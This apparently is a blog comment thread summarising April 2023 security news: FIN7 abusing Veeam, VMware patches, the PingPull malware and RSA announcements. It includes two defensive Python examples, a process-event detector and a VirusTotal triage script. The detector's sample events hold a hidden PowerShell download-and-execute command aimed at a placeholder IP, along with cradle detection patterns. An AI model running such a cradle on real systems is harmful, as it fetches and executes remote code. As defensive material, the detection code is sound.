The cybersecurity firm observed a Veeam Backup process executing a shell command to download and execute a PowerShell script that turned out to be the Powertrash in-memory dropper known to be used by FIN7.
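The observation in the comment above, a Veeam Backup process running a shell that fetches and executes a PowerShell script, is a clean parent/child relationship to alert on. The following is an added example written for this page, not WithSecure's detection logic or Veeam code: it scores process-creation events with Sysmon Event ID 1 field names, alerting when a Veeam backup binary spawns a shell interpreter and when a PowerShell command line carries a download cradle or encoded command. The assumption that Veeam service binaries are named `Veeam.Backup.<Component>.exe`, the shell and cradle lists, and the sample events are all constructed for the example.

```python
import ntpath
import re

# Parent binaries that have no business launching an interactive shell.
# Assumption (not from the article): Veeam service binaries are named "Veeam.Backup.<Component>.exe".
VEEAM_PARENT = re.compile(r"^veeam\.backup\..+\.exe$", re.IGNORECASE)
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Fragments typical of a download-and-execute cradle or an encoded command.
CRADLE = re.compile(
    r"(downloadstring|downloadfile|invoke-webrequest|\biwr\b|\biex\b|invoke-expression"
    r"|\s-e(nc|ncodedcommand)?\s|frombase64string|https?://)",
    re.IGNORECASE,
)


def score_event(ev: dict) -> dict:
    """Evaluate one process-creation event (Sysmon Event ID 1 field names)."""
    parent = ntpath.basename(ev.get("ParentImage", ""))
    child = ntpath.basename(ev.get("Image", ""))
    cmd = ev.get("CommandLine", "")
    reasons = []
    if VEEAM_PARENT.match(parent) and child.lower() in SHELLS:
        reasons.append(f"{parent} spawned {child}")
    if child.lower() in ("powershell.exe", "pwsh.exe") and CRADLE.search(cmd):
        reasons.append("download cradle or encoded command in PowerShell command line")
    return {"host": ev.get("Computer"), "time": ev.get("UtcTime"),
            "reasons": reasons, "alert": bool(reasons)}


def hunt(events) -> list:
    """Return only the events that produced at least one reason."""
    return [r for r in map(score_event, events) if r["alert"]]


# Constructed sample events in Sysmon Event ID 1 shape (illustrative, not WithSecure's telemetry).
SAMPLE_EVENTS = [
    {"Computer": "bkp01", "UtcTime": "2023-03-28 02:14:07",
     "ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/p.ps1')\""},
    {"Computer": "bkp01", "UtcTime": "2023-03-28 02:14:08",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                    ".DownloadString('http://203.0.113.10/p.ps1')\""},
    {"Computer": "bkp01", "UtcTime": "2023-03-28 02:15:00",          # normal Veeam behaviour
     "ParentImage": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Service.exe",
     "Image": r"C:\Program Files\Veeam\Backup and Replication\Backup\Veeam.Backup.Manager.exe",
     "CommandLine": "Veeam.Backup.Manager.exe"},
    {"Computer": "ws17", "UtcTime": "2023-03-28 09:01:33",           # admin at a console
     "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -Command Get-ChildItem C:\Temp"},
]

if __name__ == "__main__":
    for a in hunt(SAMPLE_EVENTS):
        print(a["host"], a["time"], "; ".join(a["reasons"]))
```

The first rule is the high-confidence one: a backup service process has a small, stable set of legitimate children, so a shell under it is worth an alert even with a benign-looking command line. The cradle rule is noisier on its own and is better used to enrich or escalate the first.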
Tomi Engdahl says:
VMware Releases Critical Patches for Workstation and Fusion Software
https://thehackernews.com/2023/04/vmware-releases-critical-patches-for.html
VMware has released updates to resolve multiple security flaws impacting its Workstation and Fusion software, the most critical of which could allow a local attacker to achieve code execution.
The vulnerability, tracked as CVE-2023-20869 (CVSS score: 9.3), is described as a stack-based buffer-overflow vulnerability that resides in the functionality for sharing host Bluetooth devices with the virtual machine.
“A malicious actor with local administrative privileges on a virtual machine may exploit this issue to execute code as the virtual machine’s VMX process running on the host,” the company said.
Also patched by VMware is an out-of-bounds read vulnerability affecting the same feature (CVE-2023-20870, CVSS score: 7.1), that could be abused by a local adversary with admin privileges to read sensitive information contained in hypervisor memory from a virtual machine.
Both vulnerabilities were demonstrated by researchers from STAR Labs on the third day of the Pwn2Own hacking contest held in Vancouver last month, earning them an $80,000 reward.
VMware has also resolved two additional shortcomings, which include a local privilege escalation flaw (CVE-2023-20871, CVSS score: 7.3) in Fusion and an out-of-bounds read/write vulnerability in SCSI CD/DVD device emulation (CVE-2023-20872, CVSS score: 7.7).
https://www.vmware.com/security/advisories/VMSA-2023-0008.html
Impacted Products
VMware Workstation Pro / Player (Workstation)
VMware Fusion
Tomi Engdahl says:
Lookout sells its consumer cybersecurity business to F-Secure for $223M and goes all-in on the enterprise
https://techcrunch.com/2023/04/26/lookout-sells-its-consumer-cybersecurity-business-to-f-secure-and-goes-all-in-on-the-enterprise/
Lookout’s long-running transition to becoming an enterprise security company is all but complete, revealing today that it’s selling its consumer mobile security business to Finland’s F-Secure in a deal valued at around $223 million.
Founded out of San Francisco in 2009, Lookout originally started as a consumer-focused smartphone security and data backup business, garnering millions of users and hundreds of millions in funding from esteemed investors, including Andreessen Horowitz, Accel, Greylock, Morgan Stanley, Deutsche Telekom and Jeff Bezos.
Tomi Engdahl says:
Tom Warren / The Verge:
Some users say Microsoft Edge sends URLs of visited pages to the Bing API website; a developer says Edge’s creator follow option, on by default, may be to blame — Microsoft’s Edge browser appears to be sending URLs you visit to its Bing API website. … Microsoft tells The Verge it’s investigating the reports.
Microsoft Edge is leaking the sites you visit to Bing
It’s probably a good idea to disable Edge’s follow creator feature until this privacy issue is fixed.
https://www.theverge.com/2023/4/25/23697532/microsoft-edge-browser-url-leak-bing-privacy
Tomi Engdahl says:
Chinese hacker group now attacks Linux
https://etn.fi/index.php/13-news/14896-kiinalainen-hakkeriryhmae-hyoekkaeae-nyt-linuxiin
According to information published by Unit 42, the security research unit of the security company Palo Alto Networks, the Chinese hacker group Alloy Taurus is using a new version of the PingPull malware in its attacks. Its new Linux version appears to be effectively evading security software.
The first samples of the PingPull malware date from September 2021. The malware found at that time has since been linked in particular to the Chinese hacker group that has been given the name Alloy Taurus. The group has also been identified under other names, such as Gallium and Softcell. Traces of the group's activity go back as far as 2012.
The group has become particularly known for cyber espionage operations targeting telecommunications companies in Asia, Europe and Africa.
The new Linux version of the PingPull malware has been effective in evading detection by security software. For example, according to VirusTotal data, none of 62 different antivirus engines was able to identify PingPull as malware.
Chinese Alloy Taurus Updates PingPull Malware
https://unit42.paloaltonetworks.com/alloy-taurus/
Unit 42 researchers recently identified a new variant of PingPull malware used by Alloy Taurus actors designed to target Linux systems. While following the infrastructure leveraged by the actor for this PingPull variant, we also identified their use of another backdoor we track as Sword2033.
The first samples of PingPull malware date back to September 2021. Monitoring its use across several campaigns, in June 2022 Unit 42 published research outlining the functionality of PingPull and attributed the use of the tool to Alloy Taurus.
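The "0 of 62 engines" figure quoted above is the kind of number that gets misread as "clean". As an added example for this page, not Unit 42's code or anything from the VirusTotal client library, the following parses a VirusTotal API v3 file object offline, computes a detection ratio that excludes engines which could not scan the file at all, lists the engines that did flag it, and treats zero detections on a file recovered from an intrusion as an escalation rather than an all-clear. The report objects are constructed by `make_report` with a placeholder hash; only the field names (`last_analysis_stats`, `last_analysis_results`) follow the real v3 schema.

```python
import json


def make_report(malicious: int, undetected: int, unsupported: int, flagged: list) -> dict:
    """Build a constructed VT v3 file object with only the fields used below (placeholder hash)."""
    results = {name: {"category": "malicious", "result": "Trojan.Generic"} for name in flagged}
    results.update({f"Engine{i}": {"category": "undetected", "result": None}
                    for i in range(undetected)})
    return {"data": {"type": "file", "id": "00" * 32, "attributes": {
        "last_analysis_stats": {"harmless": 0, "malicious": malicious, "suspicious": 0,
                                "undetected": undetected, "type-unsupported": unsupported,
                                "timeout": 0, "failure": 0, "confirmed-timeout": 0},
        "last_analysis_results": results}}}


def detection_ratio(report: dict) -> tuple:
    """Return (engines flagging the file, engines that actually produced a verdict)."""
    stats = report["data"]["attributes"]["last_analysis_stats"]
    flagged = stats.get("malicious", 0) + stats.get("suspicious", 0)
    # Engines that could not scan the file (type-unsupported, timeout, failure)
    # are left out of the denominator so an ELF is not "cleaner" for being unsupported.
    scanned = flagged + stats.get("undetected", 0) + stats.get("harmless", 0)
    return flagged, scanned


def flagging_engines(report: dict) -> list:
    """Names of engines whose verdict was malicious or suspicious."""
    results = report["data"]["attributes"]["last_analysis_results"]
    return sorted(n for n, r in results.items() if r.get("category") in ("malicious", "suspicious"))


def triage(report: dict, sighted_in_intrusion: bool) -> dict:
    """Turn a VT report into a triage decision for an incident responder."""
    flagged, scanned = detection_ratio(report)
    if flagged == 0:
        # A clean VT score on a file pulled from a compromised host means no AV
        # coverage for that sample, not a benign file.
        verdict = "escalate: no AV coverage" if sighted_in_intrusion else "unknown"
    elif flagged < scanned * 0.1:
        verdict = "low coverage"
    else:
        verdict = "widely detected"
    return {"sha256": report["data"]["id"], "ratio": f"{flagged}/{scanned}",
            "verdict": verdict, "engines": flagging_engines(report)}


if __name__ == "__main__":
    # Mirrors the article's figure: 62 engines scanned, none flagged; 5 could not scan.
    print(json.dumps(triage(make_report(0, 62, 5, []), sighted_in_intrusion=True), indent=2))
```

The `sighted_in_intrusion` flag is the important design choice: context about where the file came from belongs in the decision, because a multi-scanner score says nothing about a sample the engines have simply never seen.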
Tomi Engdahl says:
RSA Conference 2023 – Announcements Summary (Day 1)
Hundreds of companies are showcasing their products and services this week at the 2023 edition of the RSA Conference in San Francisco.
https://www.securityweek.com/rsa-conference-2023-announcements-summary-day-1/
Akamai launches Brand Protector
Web security company Akamai has launched Brand Protector, a new solution designed to help organizations detect and disrupt phishing websites, fake online stores, and brand impersonation.
AWS announces new Amazon GuardDuty capabilities
AWS has announced three new capabilities for its Amazon GuardDuty threat detection service to help customers protect container, database and serverless workloads. The new capabilities include container runtime protection for Amazon Elastic Kubernetes Service (EKS), extended coverage for data stored in Amazon Aurora, and support for serverless applications in AWS Lambda.
Cisco unveils new XDR solution
Cisco has unveiled a new extended detection and response (XDR) solution that is designed to help organizations prioritize and remediate security incidents more efficiently using automation. The solution is currently in Beta with general availability expected for July 2023.
Google Cloud announces Security AI Workbench and ecosystem expansion
Google Cloud announced Security AI Workbench, a platform that enables partners to extend generative AI to their products. Security AI Workbench also powers a new VirusTotal code analysis feature. In addition, Google Cloud and Mandiant are combining their cybersecurity partner ecosystems, which total more than 100 vendors.
IBM launches new QRadar Security Suite
IBM has launched a new threat detection and response solution. The QRadar Security Suite includes EDR and XDR, SIEM, SOAR and log management capabilities. The company says it has rearchitected its threat detection and response portfolio to maximize speed and efficiency, and to meet the specific needs of security analysts.
Oak9 releases open source security-as-code framework and SDK
Oak9 has released Tython, an open source security-as-code (SaC) framework and software development kit (SDK) that allows security teams to build custom security reference architectures and design patterns as code.
Securonix launches unified SIEM platform
Securonix has launched its Unified Defense SIEM platform, which can accommodate massive data demands and provides threat content-as-a-service. It also provides threat sweeping, intelligence sharing, and investigation capabilities.
Sevco Security launches CAASM platform
Sevco Security has launched its cyber attack surface management (CAASM) platform, a solution powered by what the company describes as a proprietary 4D cybersecurity asset intelligence correlation and visualization engine.
SecureIQLab announces cloud firewall testing
SecureIQLab has announced an Advanced Cloud Firewall (ACFW) test designed to evaluate the ability of cloud security solutions to withstand various types of attacks. The testing process combines elements of the MITRE ATT&CK framework and the Lockheed Martin Cyber Kill Chain Model to evaluate security, performance and operational capabilities.
VMware unveils new security capabilities
VMware has unveiled several new security capabilities, including a Firewall Service offering to bring NSX security capabilities to VMware SD-WAN edge appliances, VMware Secure App IX for more secure application connectivity, and VMware Workspace ONE updates for phishing, secure access, and patch management.
Tomi Engdahl says:
https://www.bleepingcomputer.com/news/security/decoy-dog-malware-toolkit-found-after-analyzing-70-billion-dns-queries/